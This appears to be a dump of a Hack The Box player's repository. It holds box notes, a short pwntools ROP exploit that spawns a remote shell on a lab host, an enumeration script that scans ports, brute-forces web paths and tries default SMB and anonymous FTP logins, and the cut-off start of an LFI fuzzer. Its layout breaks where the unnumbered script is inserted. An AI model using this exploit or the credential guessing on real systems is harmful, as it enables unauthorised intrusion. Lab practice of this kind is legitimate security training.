https://www.youtube.com/watch?v=nqYJxEHLM60 3 | -------------------------------------------------------------------------------- /Boxes/README.md: -------------------------------------------------------------------------------- 1 | Don't Just Think Outside The Box. 
Burn The Box and Invite Everyone to The Party :) 2 | ----------------------------------------------------------------------------------- 3 | 4 | I'll keep it short and place concepts, scripts, techniques Used in Solving the Boxes. 5 | 6 | I may not interested in writing much detailed writeups but for my reference i'll note my steps in here for every retired box. 7 | 8 | Detailed walkthroughs will be available on my channel [MrR3boot](https://www.youtube.com/channel/UCW7iWOd3v1nYb-wgECvSF8w) 9 | -------------------------------------------------------------------------------- /Boxes/Safe/README.md: -------------------------------------------------------------------------------- 1 | Easy box involving binary exploitation for user part and then privilege escalation using keepass database. 2 | 3 | https://www.youtube.com/watch?v=368MzIg2GFE 4 | -------------------------------------------------------------------------------- /Boxes/Safe/rop.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #p = process("./myapp") 4 | p = remote(host='10.10.10.147',port='1337') 5 | bss = p64(0x00404048) 6 | system = p64(0x00401040) 7 | gets = p64(0x00401060) 8 | pop_rdi = p64(0x000000000040120b) 9 | 10 | buf = "A"*120 11 | buf += pop_rdi 12 | buf += bss 13 | buf += gets 14 | buf += pop_rdi 15 | buf += bss 16 | buf += system 17 | 18 | p.sendline(buf) 19 | p.sendline('/bin/sh') 20 | 21 | p.interactive() 22 | -------------------------------------------------------------------------------- /Boxes/Sizzle/README.md: -------------------------------------------------------------------------------- 1 | This box will burn everyone's head as it's pure windows and having AV, Group Policy checks in place. I recommend Red Team members to go ahead and practice this machine. 
2 | 3 | https://www.youtube.com/watch?v=PcPF1eISUs0&t=274s 4 | -------------------------------------------------------------------------------- /Boxes/Writeup/README.md: -------------------------------------------------------------------------------- 1 | Nice box by jkr that involves SQL injection to fetch SSH credentials and privilege escalation through the run-parts binary. We will also explore the unintended path of hijacking a Perl module. 2 | 3 | https://youtu.be/g22ftc5KUFk 4 | -------------------------------------------------------------------------------- /Enumeration/.gitkeep: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Enumeration/README.md: -------------------------------------------------------------------------------- 1 | # WakeUp 2 | 3 | This script automates the tasks below. Output is written under `<path>/<machine>/` (set `path` inside the script first). 4 | 1. Full-range (all ports) TCP and UDP Nmap scans, started in the background 5 | 2. Probes ports 80 and 443 with curl and, if one answers, runs gobuster to enumerate files and folders 6 | 3. If the ping TTL looks like Windows, checks port 445 and writes the smbmap share listing for a few guest/default credential pairs (anonymous/root) 7 | 4. Checks the FTP port and writes the welcome banner and directory listing when anonymous login works
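# -*- coding: utf-8 -*-
"""wakeup.py - first-pass enumeration of one target.

Usage: python wakeup.py <machine> <ip>

What it does, in order (everything is written under <path>/<machine>/):
  1. full-range TCP and UDP nmap scans, started in the background  -> nmap/
  2. curl probe of http://<ip>, then https://<ip>; a background
     gobuster run against whichever one answered                   -> web/
  3. if the ping TTL looks like Windows: port 445 check, then smbmap
     with a few guest/default credential pairs                     -> smb/
  4. port 21 check and an anonymous FTP login; the welcome banner
     and directory listing are saved                               -> ftp/

`path` must be set in the __main__ block before the script is usable.

Every external tool is started from an argument list (no shell=True): the
machine name and target come straight from argv and must never be able to
be re-interpreted as shell syntax.  Output directories are created
synchronously before anything writes into them; the old `mkdir` Popen did
not wait for the directory to exist, which the sleeps used to paper over.
"""
import ftplib
import os
import re
import socket
import subprocess
import sys
from ftplib import FTP
from threading import Thread
from time import sleep

# ANSI colours used by the status output.
_RED = "\033[1;31;40m"
_GREEN = "\033[1;32;40m"
_YELLOW = "\033[1;33;40m"
_CYAN = "\033[1;36;40m"
_WHITE = "\033[1;37;40m"

# TTL values treated as "Windows": 128 and 32 are Windows defaults, 127 is
# one router hop away from 128.  Everything else is assumed to be Linux.
_WINDOWS_TTLS = ("128", "32", "127")

# Credential pairs tried against SMB; an empty password is a real empty
# password (the old shell string passed '""', which the shell turned into '').
_SMB_CREDS = [("anonymous", "anonymous"), ("root", "root"),
              ("anonymous", ""), ("root", "")]

_GOBUSTER_WORDLIST = "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
_GOBUSTER_EXTENSIONS = "php,asp,aspx,jsp,docx,txt,zip"
_GOBUSTER_STATUS = "200,207,301,302,400,401,403,500"

# I always love to see my script colorful with banners.  The art is a raw
# string so its backslashes are not (mis)read as escape sequences.
print(_RED + r'''
_ _ __
__ __ __ __ _ | |__ ___ _ _ | '_ \
\ V V // _` | | / / / -_) | \| | | .__/
\_/\_/ \__,_| |_\_\ \___| \_,_| |_|__
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'

''' + _CYAN + "Let's Hack The Boxes " + _YELLOW + "MrR3boot" + _GREEN + r'''
╔══╗
╚╗╔╝
╔╝(¯`v´¯)
╚══`.¸.Hacking...''' + _WHITE)


def ttl_from_ping(ping_output):
    """Return the first TTL value found in ping's output, as a string.

    Mirrors the old `grep -m 1 ttl | cut -d= -f3 | cut -d' ' -f1` pipeline.
    Returns '' when no reply carried a TTL (host down, ICMP filtered).
    """
    match = re.search(r'ttl=(\d+)', ping_output, re.IGNORECASE)
    return match.group(1) if match else ""


def looks_like_windows(ttl):
    """TTL heuristic deciding whether SMB is worth probing.

    Only 128/32/127 count as Windows; '' (no reply) and everything else is
    treated as Linux, so double-check manually when nmap later shows 445 open.
    """
    return ttl in _WINDOWS_TTLS


def _ensure_dir(*parts):
    """Join *parts* into a directory, create it if needed, and return it.

    Synchronous on purpose: callers write into it right afterwards.
    """
    directory = os.path.join(*parts)
    if not os.path.isdir(directory):
        os.makedirs(directory)
    return directory


def _background(cmd):
    """Start *cmd* (an argv list) with its output discarded; nobody waits."""
    with open(os.devnull, "w") as devnull:
        return subprocess.Popen(cmd, stdout=devnull, stderr=devnull)


def _run_capture(cmd):
    """Run *cmd* (an argv list) to completion and return its stdout as text.

    Raises OSError when the binary is not installed, which callers report
    instead of misreading empty output as a result.
    """
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                            universal_newlines=True)
    stdout, _ = proc.communicate()
    return stdout


def _port_open(ip, port, timeout=10):
    """TCP connect check.  The socket is closed whether or not it connected."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        return sock.connect_ex((ip, port)) == 0
    finally:
        sock.close()


def _curl_body(url, insecure=False):
    """Fetch *url* with curl (10 s cap) and return the body text ('' on failure)."""
    cmd = ["curl", "--max-time", "10"]
    if insecure:
        cmd.append("-k")  # self-signed certs are the norm on these boxes
    return _run_capture(cmd + [url])


def _gobuster(url, outfile, insecure=False):
    """Start a background gobuster run against *url*, writing to *outfile*."""
    cmd = ["gobuster", "-s", _GOBUSTER_STATUS, "-np", "-fw", "-q",
           "-w", _GOBUSTER_WORDLIST, "-u", url, "-x", _GOBUSTER_EXTENSIONS,
           "-t", "10", "-o", outfile]
    if insecure:
        cmd.insert(1, "-k")
    _background(cmd)


def portscan(ip, machine, path):
    """Start full-range TCP and UDP nmap scans in the background.

    Results land in <path>/<machine>/nmap/{tcp,udp}-scan.*; nothing waits
    for them, so read the files after the other checks have finished.
    """
    print("\n[+] Going for port scan in background")
    outdir = _ensure_dir(path, machine, "nmap")
    # --max-retries=0 keeps the scan short, but a single dropped probe hides
    # that port for good; raise it (or re-run) when the result looks thin.
    base = ["/usr/bin/nmap", "-sV", "-sC", "-p-", "-Pn", "--max-retries=0"]
    _background(base + ["-oA", os.path.join(outdir, "tcp-scan"), ip])
    _background(base + ["-sU", "-oA", os.path.join(outdir, "udp-scan"), ip])


def webscan(ip, machine, path):
    """Probe http://ip, then https://ip, and start gobuster on the first that answers.

    "Answers" means curl returned a non-empty body; an empty 200 is treated
    as down.  Only 80 and 443 are tried - other web ports wait for nmap.
    """
    print("\n" + _WHITE + "[+] Checking for web related stuff")
    sleep(3)
    http_url = "http://{}".format(ip)
    if _curl_body(http_url) != "":
        webdir = _ensure_dir(path, machine, "web")
        print(" " + _GREEN + "[*] Port 80 is up. Going in")
        _gobuster(http_url, os.path.join(webdir, "go_http"))
        return
    print(" " + _RED + "[-] Port 80 is down. Checking SSL")
    https_url = "https://{}".format(ip)
    if _curl_body(https_url, insecure=True) != "":
        webdir = _ensure_dir(path, machine, "web")
        print(" " + _GREEN + "[*] Port 443 is up. Going in")
        _gobuster(https_url, os.path.join(webdir, "go_https"), insecure=True)
        return
    print(" " + _RED + "[-] Port 443 is down. Giving up")


def smbscan(ip, machine, path):
    """If the host looks like Windows (ping TTL), try a few SMB credential pairs.

    Each pair that is not rejected with "Authentication error" and produces
    output has its smbmap listing saved to <path>/<machine>/smb/scan-<user>-<pass>
    ("nopass" stands in for an empty password in the file name).
    """
    print("\n" + _WHITE + "[+] Checking if OS is Win/Linux")
    ping_output = _run_capture(["ping", "-c5", ip])
    if not looks_like_windows(ttl_from_ping(ping_output)):
        print(" " + _YELLOW + "[-]It seems to be Linux. Double check if smb is open on Linux")
        return
    print(" " + _GREEN + "[+] It's Windows Machine. Checking SMB Port")
    if not _port_open(ip, 445):
        print(" " + _RED + "[-] Port 445 is down. Giving up")
        return
    print(" " + _GREEN + "[+] Port open. Checking shares")
    smbdir = _ensure_dir(path, machine, "smb")
    for user, passwd in _SMB_CREDS:
        try:
            stdout = _run_capture(["smbmap", "-u", user, "-p", passwd, "-H", ip])
        except OSError as exc:
            # Missing binary used to look like "access granted" with empty output.
            print(" " + _RED + "[-] Could not run smbmap: {}".format(exc))
            return
        if re.search(r'Authentication error', stdout):
            print(" " + _RED + "[-] We don't have access to shares with {}:{}".format(user, passwd))
            continue
        if stdout.strip() == "":
            print(" " + _RED + "[-] smbmap produced no output for {}:{}".format(user, passwd))
            continue
        print(" " + _GREEN + "[*] Found shares accessible using {}:{}. Writing Results..".format(user, passwd))
        outfile = os.path.join(smbdir, "scan-{}-{}".format(user, passwd or "nopass"))
        with open(outfile, "w") as handle:
            handle.write(stdout)


def ftpscan(ip, machine, path):
    """Check port 21 and, if open, try an anonymous login and save the listing.

    The old version called getwelcome() with an argument, which always raised
    and was swallowed by a bare except - so the success path never ran.
    """
    sleep(4)
    print("\n" + _WHITE + "[+] Checking if FTP is up")
    if not _port_open(ip, 21):
        print(" " + _RED + "[-] Port 21 is closed. Double check port scan due to resets from fellow hackers..")
        return
    print(" " + _GREEN + "[*] Port 21 is open. Checking anonymous access")
    lines = []
    try:
        ftp = FTP(ip, timeout=10)
        ftp.login()
        lines.append(ftp.getwelcome())
        ftp.dir(lines.append)
        ftp.quit()
    except ftplib.all_errors as exc:
        print(" " + _RED + "[-] Login failed. ({})".format(exc))
        return
    ftpdir = _ensure_dir(path, machine, "ftp")
    with open(os.path.join(ftpdir, "anon-login"), "w") as handle:
        for line in lines:
            handle.write(line + "\n")


if __name__ == "__main__":
    if len(sys.argv[1:]) < 2:
        print("\nUsage: python wakeup.py <machine> <ip>\n")
    else:
        machine = sys.argv[1]
        ip = sys.argv[2]
        # Modify this line to your need.
        path = ""
        if path == "":
            print("\nPlease open the script and setup the path to store output")
        elif os.sep in machine or machine in ("", ".", ".."):
            # The machine name becomes a directory under `path`; keep it a single component.
            print("\nMachine name is used as a directory name; pick one without path separators")
        else:
            t1 = Thread(target=portscan, args=(ip, machine, path,))
            t2 = Thread(target=webscan, args=(ip, machine, path,))
            t3 = Thread(target=smbscan, args=(ip, machine, path,))
            t4 = Thread(target=ftpscan, args=(ip, machine, path,))
            t1.start()
            t2.start()
            t1.join()
            t2.join()
            t3.start()
            t3.join()
            t4.start()
            t4.join()
            # Subprocess output leaves the terminal fuzzy; reset it for normal use.
            subprocess.call(["stty", "sane"])
            print("\n" + _WHITE + "[*] Job Done. Check {} for results..".format(os.path.join(path, machine)))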
___ _,---. 9 | .-`.' , \ .-._ .'=.'\ .-`.' , \ 10 | /==/_ _.-'/==/ \|==| |/==/_ _.-' 11 | /==/- '..-.|==|,| / - /==/- '..-. 12 | |==|_ , /|==| \/ , |==|_ , / 13 | |==| .--' |==|- , _ |==| .--' 14 | |==|- | |==| _ /\ |==|- | 15 | /==/ \ /==/ / / , /==/ \ 16 | `--`---' `--`./ `--``--`---' 17 | \033[1;34;40mF\033[1;31;40muzz \033[1;34;40mM\033[1;31;40my \033[1;34;40mF\033[1;31;40miles \033[1;33;40mBy MrR3boot\033[1;32;40m \n''' 18 | 19 | def lfi(url,payload,length,cookies,response): 20 | url = url+payload 21 | int = random.randint(0,10000000) 22 | r = requests.get(url,cookies=cookies,headers={'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101{} Firefox/60.0'.format(int)}) 23 | if r.headers['Content-Length']!=length: 24 | maxlen=len(r.text) if len(response)